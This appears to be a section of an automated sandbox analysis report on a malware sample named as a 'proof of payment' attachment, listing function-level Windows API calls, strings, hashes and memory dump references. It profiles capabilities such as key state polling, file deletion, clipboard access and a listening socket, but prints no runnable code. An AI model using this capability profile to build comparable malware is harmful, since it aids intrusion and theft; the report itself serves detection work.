Opcode Fuzzy Hash: 6255b700f804bc3f9cdf5b4f5f5e8849b69937ac10030d213903e86b18a029aa
Instruction Fuzzy Hash: D031C3325006197BEB21ABF4DC48EDE77ECAF05320F04019AE985D20C0EB79DA858F64

Function 01001C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 01001CAB
_wcscmp.LIBCMT ref: 01001CC0
_wcscmp.LIBCMT ref: 01001CD7

Part of subcall function 00FF6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00FF6BEF

FindNextFileW.KERNEL32(00000000,?), ref: 01001D06
FindClose.KERNEL32(00000000), ref: 01001D11
FindFirstFileW.KERNEL32(*.*,?), ref: 01001D2D
_wcscmp.LIBCMT ref: 01001D54
_wcscmp.LIBCMT ref: 01001D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 01001D7D
SetCurrentDirectoryW.KERNEL32(010639FC), ref: 01001D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 01001DA5
FindClose.KERNEL32(00000000), ref: 01001DB2
FindClose.KERNEL32(00000000), ref: 01001DC2

Strings

*.*, xrefs: 01001D28

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 3998ed1999ff84061f1bd589247df1426011ef10d66082a4fbccbe2018abf91e
Instruction ID: 0a059420c3894aa4005b43173f49133b24912d5b6ba0a2f9f5544130a5460600
Opcode Fuzzy Hash: 3998ed1999ff84061f1bd589247df1426011ef10d66082a4fbccbe2018abf91e
Instruction Fuzzy Hash: 0031143250021A7BEF22BBE4EC48ADE3BADAF05320F140596E980E71D0DB35DA45CF60

Function 00FB7D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FB7DBD

Strings

\b(?<=\w), xrefs: 0102F877
^, xrefs: 00FB7D96
\b(?=\w), xrefs: 0102F85E
\, xrefs: 0102F95B
\, xrefs: 00FB7E1D
[, xrefs: 00FB7E14
\, xrefs: 00FB7D89
[:<:]], xrefs: 00FB7D1D
Q\E, xrefs: 00FB86D6
], xrefs: 00FB7D9F
[:>:]], xrefs: 00FB7D37

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
API String ID: 2102423945-2023335898
Opcode ID: 80612e06af56175db4dbf5377dca49d494c76b4aaf078e29bbeec3e3daeb4d27
Instruction ID: cd5a75ca695d84e0e31902aa6021588fa7ac798f81b24b4ede545da78ee9efa1
Opcode Fuzzy Hash: 80612e06af56175db4dbf5377dca49d494c76b4aaf078e29bbeec3e3daeb4d27
Instruction Fuzzy Hash: 8482D271D0422ACBDF25CF99C8807EDBBB5BF88360F2581A9D895AB241D7749D81DF80

Function 0100091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 010009DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 010009EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 010009FB
__wsplitpath.LIBCMT ref: 01000A59
_wcscat.LIBCMT ref: 01000A71
_wcscat.LIBCMT ref: 01000A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 01000A98
SetCurrentDirectoryW.KERNEL32(?), ref: 01000AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 01000ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 01000AFF
_wcscpy.LIBCMT ref: 01000B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 01000B4A

Strings

*.*, xrefs: 01000B05

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 8d89bc4642e1d5b6ae9d74fcfe31ef74c83699165ef145d2ec35768a5914cfcc
Instruction ID: 82bbfdf15511b426cf8192a5c08a94d8756ba17188ce1bc49ddb1a03390a0076
Opcode Fuzzy Hash: 8d89bc4642e1d5b6ae9d74fcfe31ef74c83699165ef145d2ec35768a5914cfcc
Instruction Fuzzy Hash: 136169725043059FE710EF64C840AAEB3E9FF89310F04895EFA89C7251EB39E945CB92

Function 00FEA66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FEABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00FEABD7
Part of subcall function 00FEABBB: GetLastError.KERNEL32(?,00FEA69F,?,?,?), ref: 00FEABE1
Part of subcall function 00FEABBB: GetProcessHeap.KERNEL32(00000008,?,?,00FEA69F,?,?,?), ref: 00FEABF0
Part of subcall function 00FEABBB: HeapAlloc.KERNEL32(00000000,?,00FEA69F,?,?,?), ref: 00FEABF7
Part of subcall function 00FEABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00FEAC0E

Part of subcall function 00FEAC56: GetProcessHeap.KERNEL32(00000008,00FEA6B5,00000000,00000000,?,00FEA6B5,?), ref: 00FEAC62
Part of subcall function 00FEAC56: HeapAlloc.KERNEL32(00000000,?,00FEA6B5,?), ref: 00FEAC69
Part of subcall function 00FEAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FEA6B5,?), ref: 00FEAC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FEA6D0
_memset.LIBCMT ref: 00FEA6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FEA704
GetLengthSid.ADVAPI32(?), ref: 00FEA715
GetAce.ADVAPI32(?,00000000,?), ref: 00FEA752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FEA76E
GetLengthSid.ADVAPI32(?), ref: 00FEA78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FEA79A
HeapAlloc.KERNEL32(00000000), ref: 00FEA7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FEA7C2
CopySid.ADVAPI32(00000000), ref: 00FEA7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FEA7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FEA820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FEA834

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 1621060310ddde30c6b80ce4ceb6bce7bdc7bfaafec17d4b5edc0abce68d2eac
Instruction ID: fa06dae07118d113153898f87f3eb45e95ebd58f08f8d17ad8947617e4bde607
Opcode Fuzzy Hash: 1621060310ddde30c6b80ce4ceb6bce7bdc7bfaafec17d4b5edc0abce68d2eac
Instruction Fuzzy Hash: A2514B71900249ABDF10DFA6DC44AEEBBB9FF44710F048129F911AB280DB39EE05DB61

Function 00FB6F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

ANYCRLF), xrefs: 01032E7D
NO_START_OPT), xrefs: 01032CD1
LIMIT_MATCH=, xrefs: 01032CF2
LF), xrefs: 01032E26
CR), xrefs: 01032E09
BSR_ANYCRLF), xrefs: 01032EA0
UTF16), xrefs: 01032C56
LIMIT_RECURSION=, xrefs: 01032D7E
UCP), xrefs: 01032C8F
ANY), xrefs: 01032E60
UTF), xrefs: 01032C7C
CRLF), xrefs: 01032E43
BSR_UNICODE), xrefs: 01032EBA
NO_AUTO_POSSESS), xrefs: 01032CB0

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: e05da8c46da766f829eb1c5167b06af797631866ab4aa71ad54bb257950b18cd
Instruction ID: 63d945b1f8c5cbe1c72d8c179c8d3bc550545ff232944db3ae3eb49c6c520bdb
Opcode Fuzzy Hash: e05da8c46da766f829eb1c5167b06af797631866ab4aa71ad54bb257950b18cd
Instruction Fuzzy Hash: E7726F71E04219DBDB25DF59C8807EEB7F9BF88310F1481AAE845EB281DB749A41DF90

Function 00FF63F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00FF6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FF5FA6,?), ref: 00FF6ED8

Part of subcall function 00FF72CB: GetFileAttributesW.KERNEL32(?,00FF6019), ref: 00FF72CC

_wcscat.LIBCMT ref: 00FF6441
__wsplitpath.LIBCMT ref: 00FF645F
FindFirstFileW.KERNEL32(?,?), ref: 00FF6474
_wcscpy.LIBCMT ref: 00FF64A3
_wcscat.LIBCMT ref: 00FF64B8
_wcscat.LIBCMT ref: 00FF64CA
DeleteFileW.KERNEL32(?), ref: 00FF64DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 00FF64EB
FindClose.KERNEL32(00000000), ref: 00FF6506

Strings

\*.*, xrefs: 00FF643B

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: 74378852f7adcea4d1b51fc56ce5e890138738b62215cbe22291f03d0922eed6
Instruction ID: e57a6d6286181b9179b22913e5070e361814860f2398db108b219a43118c79d9
Opcode Fuzzy Hash: 74378852f7adcea4d1b51fc56ce5e890138738b62215cbe22291f03d0922eed6
Instruction Fuzzy Hash: 293186B24083886AC721EBE48C85AEB77DCAF55310F480A1EF6D9C3141EE39D50D9767

Function 010131BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 01013C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01012BB5,?,?), ref: 01013C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0101328E

Part of subcall function 00FB936C: __swprintf.LIBCMT ref: 00FB93AB
Part of subcall function 00FB936C: __itow.LIBCMT ref: 00FB93DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0101332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 010133C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01013604
RegCloseKey.ADVAPI32(00000000), ref: 01013611

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 42ea2ae7b07854b431a14bef2b41389cbafa3c794147c828f19db41b1279aa80
Instruction ID: 18ddd23eb8e3ab8f3bd45dabf8daa200581e7fe14aa2efa88aa63ecae7d17f20
Opcode Fuzzy Hash: 42ea2ae7b07854b431a14bef2b41389cbafa3c794147c828f19db41b1279aa80
Instruction Fuzzy Hash: DEE16D35604200AFCB14DF29C995E6EBBE8FF88720B04886DF58ADB255DB39E905CF51

Function 00FF2B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00FF2B5F
GetAsyncKeyState.USER32(000000A0), ref: 00FF2BE0
GetKeyState.USER32(000000A0), ref: 00FF2BFB
GetAsyncKeyState.USER32(000000A1), ref: 00FF2C15
GetKeyState.USER32(000000A1), ref: 00FF2C2A
GetAsyncKeyState.USER32(00000011), ref: 00FF2C42
GetKeyState.USER32(00000011), ref: 00FF2C54
GetAsyncKeyState.USER32(00000012), ref: 00FF2C6C
GetKeyState.USER32(00000012), ref: 00FF2C7E
GetAsyncKeyState.USER32(0000005B), ref: 00FF2C96
GetKeyState.USER32(0000005B), ref: 00FF2CA8

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 708a5e881ff3ffdbd6851f8f479a5cc7d28bb75d42bc000f5d933309f2be3548
Instruction ID: a4c5f94cf65a15d49e2266db1e74924b461fd88f676ebf1c8a2c9ab70b13c9f6
Opcode Fuzzy Hash: 708a5e881ff3ffdbd6851f8f479a5cc7d28bb75d42bc000f5d933309f2be3548
Instruction Fuzzy Hash: 1341F630D047CD6DFFB19A6084043BDBEA0AF11374F444049DBC6562E1DB9499C4E7A2

Function 01006D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 01006D2E
EmptyClipboard.USER32 ref: 01006D34
GlobalAlloc.KERNEL32(00000002,?), ref: 01006D49
CloseClipboard.USER32 ref: 01006DE8

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: e70996649f1ddb5f3b3f713f510bb8c4f3b5d98489ac38547fb0759fe993152b
Instruction ID: 7a25de15e0eb6f8d6dbd7bd48c8fedd882a57be6d5981d54d77144106687cd3c
Opcode Fuzzy Hash: e70996649f1ddb5f3b3f713f510bb8c4f3b5d98489ac38547fb0759fe993152b
Instruction Fuzzy Hash: 4C21B5316001109FE722BF68DD49F2D77E9FF08720F04841AF996DB291DB7AE9109B90

Function 0100C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 00FE9ABF: CLSIDFromProgID.OLE32 ref: 00FE9ADC
Part of subcall function 00FE9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00FE9AF7
Part of subcall function 00FE9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00FE9B05
Part of subcall function 00FE9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00FE9B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0100C235
_memset.LIBCMT ref: 0100C242
_memset.LIBCMT ref: 0100C360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0100C38C
CoTaskMemFree.OLE32(?), ref: 0100C397

Strings

NULL Pointer assignment, xrefs: 0100C3E5

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 68183a44e0b442ed7b511f8876bdc8d9b217c9346e80326d1dff4ed99efd3709
Instruction ID: 1093661fc386c6510dc1147e4f0e03bfe99812b30f5f619c3fa7d2c730ea9cbe
Opcode Fuzzy Hash: 68183a44e0b442ed7b511f8876bdc8d9b217c9346e80326d1dff4ed99efd3709
Instruction Fuzzy Hash: 6D916D71D00218ABEB11DF95DC81EDEBBB9FF44310F10816AF519A7281EB746A45CFA0

Function 00FF79D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00FEB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FEB180
Part of subcall function 00FEB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FEB1AD
Part of subcall function 00FEB134: GetLastError.KERNEL32 ref: 00FEB1BA

ExitWindowsEx.USER32(?,00000000), ref: 00FF7A0F

Strings

, xrefs: 00FF79FD
SeShutdownPrivilege, xrefs: 00FF79DD
@, xrefs: 00FF7A02

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 88edd94cec8bdc19c4eda401f93a6faef41a56173346dd70b24388a7283153d6
Instruction ID: 85234028068855dffeba652daf501953d9b920bc61ef89969bf888af537b022e
Opcode Fuzzy Hash: 88edd94cec8bdc19c4eda401f93a6faef41a56173346dd70b24388a7283153d6
Instruction Fuzzy Hash: AC01FC71A583196AF73836749C8AFBFB25C9F00750F160424FB43A20F2D5AD5E00A2A0

Function 01008C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 01008CA8
WSAGetLastError.WSOCK32(00000000), ref: 01008CB7
bind.WSOCK32(00000000,?,00000010), ref: 01008CD3
listen.WSOCK32(00000000,00000005), ref: 01008CE2
WSAGetLastError.WSOCK32(00000000), ref: 01008CFC
closesocket.WSOCK32(00000000), ref: 01008D10

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 6651e4c878b27070f4d062ba0761a2ee9b26595ffecaed8828ab926ba0780487
Instruction ID: 7152ea3472545569c1097e27ff7fd32383c0acdd350b4c6a90e47932f112863c
Opcode Fuzzy Hash: 6651e4c878b27070f4d062ba0761a2ee9b26595ffecaed8828ab926ba0780487
Instruction Fuzzy Hash: D821D231600205AFDB21EF68CD85B6EB7E9FF48320F148159F996A73D2DB34AD018B51

Function 00FF6532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00FF6554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00FF6564
Process32NextW.KERNEL32(00000000,0000022C), ref: 00FF6583
__wsplitpath.LIBCMT ref: 00FF65A7
_wcscat.LIBCMT ref: 00FF65BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00FF65F9

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: f78e2852b7e7cc3a489ad4f0272c9563b622ec57a685971eb66a86a00feac03f
Instruction ID: c0430c4a585619bbccc169ae1faf7dab2b56757dfa510a480eeaf8aba39f3a36
Opcode Fuzzy Hash: f78e2852b7e7cc3a489ad4f0272c9563b622ec57a685971eb66a86a00feac03f
Instruction Fuzzy Hash: E421957190021CABDB20ABA4CC88BEDB7BDAF05310F5800A5F645E7141EF759F85DB60

Function 0100923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0100A82C: inet_addr.WSOCK32(00000000), ref: 0100A84E

socket.WSOCK32(00000002,00000002,00000011), ref: 01009296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 010092B9

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: ac5b88a1133f80e65461c1e2c04f0841abd1521d5b414685e71807b536ab9d77
Instruction ID: ca9ddfe42c46f7b057cd37fe34e51314f9d5d5f2379fe8d4f4fa10c5184843d7
Opcode Fuzzy Hash: ac5b88a1133f80e65461c1e2c04f0841abd1521d5b414685e71807b536ab9d77
Instruction Fuzzy Hash: A2419F70600205AFEB11AB688D82E7E77EDEF44724F04845CF956AB3C2DB799D019B91

Function 00FFEB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00FFEB8A
